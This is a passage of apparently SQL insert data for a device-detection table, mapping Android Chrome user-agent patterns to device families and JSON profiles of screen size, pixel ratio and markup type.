Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; HRY-AL00a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; HRY-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; HRY-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; HRY-LX1MEB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; HRY-LX1T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; HRY-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; HTC Desire 20 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":936,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; HTC U11 life) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; HWV33) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":771,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Hammer_Blade_3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Hammer_Energy_2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; I3113) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":840,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; I3123) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":840,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; I4113) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":840,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; I4213) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; IN2010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; IN2013) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; IN2023) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":905,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Infinix X604) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Infinix X605) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Infinix X612) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Infinix X655) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Infinix X655C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Infinix X656) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Infinix X657) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Infinix X657B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Infinix X657C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Infinix X660B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Infinix X660C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Infinix X680) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Infinix X680B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Infinix X682B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Infinix X682C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Infinix X683) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Infinix X687) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Infinix X688B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Infinix X688C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Infinix X690) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Infinix X690B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Infinix X692) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; J8110) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; J8210) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; J9110) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":418,\"screenHeight\":975,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; J9210) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; JNY-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; JNY-LX1; HMSCore 5.0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; JNY-LX1; HMSCore 5.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; JNY-LX1; HMSCore 5.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; JNY-LX1; HMSCore 5.3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; JNY-LX1; HMSCore 6.0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; JNY-LX1; HMSCore 6.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; JNY-LX1; HMSCore 6.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; JNY-LX1; HMSCore 6.3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; JNY-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; JNY-LX2; HMSCore 5.0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; JSN-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; JSN-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; JSN-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; JSN-L42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Joy 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; KING KONG CS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; KOB2-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; KYV46) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LIO-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":392,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LIO-AN00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":392,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LIO-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":392,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-G710) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-G810) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":857,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-G820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-G850) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-G900) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":937,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-G910) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":937,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-K200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-K300) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-K410) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":235,\"screenHeight\":523,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-K420) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-K500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-K510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-K520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-K526) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-K920) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-Q630) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":892,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-Q730) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":937,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-Q910) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 